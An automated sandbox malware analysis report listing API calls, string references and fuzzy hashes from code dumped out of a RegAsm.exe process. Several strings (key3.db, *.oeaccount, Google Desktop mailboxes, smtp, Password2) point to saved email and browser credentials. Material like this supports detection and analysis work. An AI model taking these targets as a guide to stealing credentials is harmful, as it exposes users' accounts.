                                                                                                                                                                                                • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B9B1
                                                                                                                                                                                                  • Part of subcall function 00406C62: LoadCursorA.USER32(00000000,00007F02), ref: 00406C69
                                                                                                                                                                                                  • Part of subcall function 00406C62: SetCursor.USER32(00000000), ref: 00406C70
                                                                                                                                                                                                • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B9D4
                                                                                                                                                                                                  • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B929
                                                                                                                                                                                                  • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B953
                                                                                                                                                                                                  • Part of subcall function 0040B903: _mbscat.MSVCRT ref: 0040B966
                                                                                                                                                                                                  • Part of subcall function 0040B903: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                                                                                                                                • SetCursor.USER32 ref: 0040B9F9
                                                                                                                                                                                                • SetFocus.USER32(?), ref: 0040BA0B
                                                                                                                                                                                                • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040BA22
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2374668499-0
                                                                                                                                                                                                • Opcode ID: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                                                                                                                                                                                                • Instruction ID: f32a2dbc35f7bf6d698eec3472f2a5e56a7287d41e7566127b95ec9cf4f32314
                                                                                                                                                                                                • Opcode Fuzzy Hash: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 450129B5204604EFD326AB75DC85FA6B7E8FF48305F0504B9F2499B271CA716D018B14
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 0040AD5B
                                                                                                                                                                                                • memset.MSVCRT ref: 0040AD71
                                                                                                                                                                                                  • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                                  • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                                                                                  • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                                                                                                                                  • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                                                                                                • sprintf.MSVCRT ref: 0040ADA8
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040AD76
                                                                                                                                                                                                • <%s>, xrefs: 0040ADA2
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                                                                                                                • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                                • API String ID: 3699762281-1998499579
                                                                                                                                                                                                • Opcode ID: 795a8691700f312257f705e85a86cce67b218055e3179b2cedf5ba95f87480a6
                                                                                                                                                                                                • Instruction ID: d8254de8a9900f2911fb5d1c0b13fc0cc865a5027b69882d7a9a790f368f6919
                                                                                                                                                                                                • Opcode Fuzzy Hash: 795a8691700f312257f705e85a86cce67b218055e3179b2cedf5ba95f87480a6
                                                                                                                                                                                                • Instruction Fuzzy Hash: 49012B7294012877E721A719CC46FDABB6C9F54304F0500F7B50DF3082DBB8AB508BA4
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ??3@
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                                                                • Opcode ID: 719bf35f5edd6f743f398197aebabc3c3e3d79d9cb1a1b13ae007a7bface88c2
                                                                                                                                                                                                • Instruction ID: b8efe39ffa321d4f2ce8ce974eba3160cbf96dc633dc1e2aadb4e529a4dc2577
                                                                                                                                                                                                • Opcode Fuzzy Hash: 719bf35f5edd6f743f398197aebabc3c3e3d79d9cb1a1b13ae007a7bface88c2
                                                                                                                                                                                                • Instruction Fuzzy Hash: A9F0F4726057855BD7209F6999C1A57F7D9BB98714791083FF189F3A81CB38FC404A18
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                                                                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                                                                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                                                                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                                                                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AB3
                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AC6
                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AD9
                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AEC
                                                                                                                                                                                                • free.MSVCRT ref: 00409B00
                                                                                                                                                                                                  • Part of subcall function 00407A55: free.MSVCRT ref: 00407A5C
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ??3@$free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2241099983-0
                                                                                                                                                                                                • Opcode ID: 15a481c8f84ee3b442f71837438c05ceab47f4c823323df975f811a14ab91f85
                                                                                                                                                                                                • Instruction ID: 0e1833da384361268bbd99a4020487bffb4c29eeff2b5ca4c2d3cb4a232d8152
                                                                                                                                                                                                • Opcode Fuzzy Hash: 15a481c8f84ee3b442f71837438c05ceab47f4c823323df975f811a14ab91f85
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3FF0A932F068B05BC2117B669002B0EB398AD81B2831A016FF8147B6D2CB3CBC504ADE
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                                                                                                                                                                                  • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                                                                                                                                                                                  • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                                                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                                                                                                                                                                                • GetSysColor.USER32(00000005), ref: 004107A6
                                                                                                                                                                                                • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                                                                                                                                                                                • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                                                                                                                                                                                • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2775283111-0
                                                                                                                                                                                                • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                                                                                                                • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                                                                                                                                                                                                • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                                                                                                                • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • BeginDeferWindowPos.USER32(0000000A), ref: 00405F6C
                                                                                                                                                                                                  • Part of subcall function 004015F4: GetDlgItem.USER32(?,?), ref: 00401604
                                                                                                                                                                                                  • Part of subcall function 004015F4: GetClientRect.USER32(?,?), ref: 00401616
                                                                                                                                                                                                  • Part of subcall function 004015F4: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00401680
                                                                                                                                                                                                • EndDeferWindowPos.USER32(?), ref: 0040602B
                                                                                                                                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 00406036
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                                                                                                                                • String ID: $
                                                                                                                                                                                                • API String ID: 2498372239-3993045852
                                                                                                                                                                                                • Opcode ID: 46c13f54b0de6b7af3bf11703fc8189c954e9ba913f197146dd0d24af27c410d
                                                                                                                                                                                                • Instruction ID: a7623898fd9bb087a7334f25a668ee6c33d9336bc772a6b4061b4b4824447eab
                                                                                                                                                                                                • Opcode Fuzzy Hash: 46c13f54b0de6b7af3bf11703fc8189c954e9ba913f197146dd0d24af27c410d
                                                                                                                                                                                                • Instruction Fuzzy Hash: C7317070640259FFEB229B52CC89DAF3E7CEBC5B98F10402DF401792A1CA794F11E669
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                • String ID: winSeekFile$winTruncate1$winTruncate2
                                                                                                                                                                                                • API String ID: 885266447-2471937615
                                                                                                                                                                                                • Opcode ID: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                                                                                                                                                • Instruction ID: 76c2d8f9c45a6ab14154b13c081d04d7f34c1e3f6c53ca943db3ce1179081271
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C313175600700AFE720AF65CC41EABB7E8FB88715F104A2EF965932D1D734E8808B29
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00406D01: CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,?,00406C55,00000000,?,00000000,?), ref: 00406AEB
                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00406B11
                                                                                                                                                                                                  • Part of subcall function 00407902: ??3@YAXPAX@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407909
                                                                                                                                                                                                  • Part of subcall function 00407902: ??2@YAPAXI@Z.MSVCRT ref: 00407917
                                                                                                                                                                                                  • Part of subcall function 00407560: ReadFile.KERNELBASE(00000000,?,004441E4,00000000,00000000), ref: 00407577
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: File$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                                • String ID: Ul@$key3.db
                                                                                                                                                                                                • API String ID: 1968906679-1563549157
                                                                                                                                                                                                • Opcode ID: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                                                                                                                                                                                • Instruction ID: 1a03c8060d8a16f0d136589656c0636480a797a3ae37aee6ed6b4138e5904ac9
                                                                                                                                                                                                • Opcode Fuzzy Hash: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                                                                                                                                                                                • Instruction Fuzzy Hash: EA1181B1D00624ABCB10AF25DC8588E7FB5EF45364B15C177F80AEB291D638ED61CB98
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _strcmpi.MSVCRT ref: 0040E134
                                                                                                                                                                                                • _strcmpi.MSVCRT ref: 0040E14D
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _strcmpi$_mbscpy
                                                                                                                                                                                                • String ID: smtp
                                                                                                                                                                                                • API String ID: 2625860049-60245459
                                                                                                                                                                                                • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                                                                                                                                                • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                                                                                                                                                • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                                                                                                                                                • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                                • memset.MSVCRT ref: 00408258
                                                                                                                                                                                                  • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Close$EnumOpenmemset
                                                                                                                                                                                                • String ID: Software\Google\Google Desktop\Mailboxes
                                                                                                                                                                                                • API String ID: 2255314230-2212045309
                                                                                                                                                                                                • Opcode ID: bd388eefff722b401c994613a19154ddee7b9885900c8831656236c5d79d68fa
                                                                                                                                                                                                • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                                                                                                                                                                                                • Opcode Fuzzy Hash: bd388eefff722b401c994613a19154ddee7b9885900c8831656236c5d79d68fa
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 0040C28C
                                                                                                                                                                                                • SetFocus.USER32(?), ref: 0040C314
                                                                                                                                                                                                  • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FocusMessagePostmemset
                                                                                                                                                                                                • String ID: S_@$l
                                                                                                                                                                                                • API String ID: 3436799508-4018740455
                                                                                                                                                                                                • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                                                                                                                                                • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                                                                                                                                                • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 004092C0
                                                                                                                                                                                                • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: PrivateProfileString_mbscpymemset
                                                                                                                                                                                                • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                                                                                                                                                                                • API String ID: 408644273-3424043681
                                                                                                                                                                                                • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                                                                                                                                                • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                                                                                                                                                                                                • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                                                                                                                                                • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _mbscpy
                                                                                                                                                                                                • String ID: C^@$X$ini
                                                                                                                                                                                                • API String ID: 714388716-917056472
                                                                                                                                                                                                • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                                                                                                                • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                                                                                                                                                                • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                                                                                                                • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                                                                                                                  • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,00401018,MS Sans Serif,0000000A,00000001), ref: 00407011
                                                                                                                                                                                                • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                                                                                                                • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                                                                                                                • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                                                                                                                • String ID: MS Sans Serif
                                                                                                                                                                                                • API String ID: 3492281209-168460110
                                                                                                                                                                                                • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                                                                                                                                                • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                                                                                                                                                • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                                                                                                                                                • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ClassName_strcmpimemset
                                                                                                                                                                                                • String ID: edit
                                                                                                                                                                                                • API String ID: 275601554-2167791130
                                                                                                                                                                                                • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                                                                                                                                                • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                                                                                                                                                • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                                                                                                                                                • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: strlen$_mbscat
                                                                                                                                                                                                • String ID: 3CD
                                                                                                                                                                                                • API String ID: 3951308622-1938365332
                                                                                                                                                                                                • Opcode ID: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                                                                                                                                                • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                                                                                                                                                                • Opcode Fuzzy Hash: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _mbscat$_mbscpy
                                                                                                                                                                                                • String ID: Password2
                                                                                                                                                                                                • API String ID: 2600922555-1856559283
                                                                                                                                                                                                • Opcode ID: 8d83a753bd2278aecac4212cdf66134528e9acc94ce1ae697df6f496e3d29f98
                                                                                                                                                                                                • Instruction ID: daa9138b3154c9efe9c83666f212cf2f945430f9457ac718319f22168f8299cd
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8d83a753bd2278aecac4212cdf66134528e9acc94ce1ae697df6f496e3d29f98
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5BC01202A4667032210275555D07F8E5818CE9279B704005BB90832113D61D965542EF
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                                • String ID: rows deleted
                                                                                                                                                                                                • API String ID: 2221118986-571615504
                                                                                                                                                                                                • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                                                                                                                • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                                                                                                                                                                                                • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                                                                                                                • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041BC7F
                                                                                                                                                                                                • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041BC95
                                                                                                                                                                                                • memcmp.MSVCRT ref: 0041BCA4
                                                                                                                                                                                                • memcmp.MSVCRT ref: 0041BCEC
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041BD07
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpy$memcmp
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3384217055-0
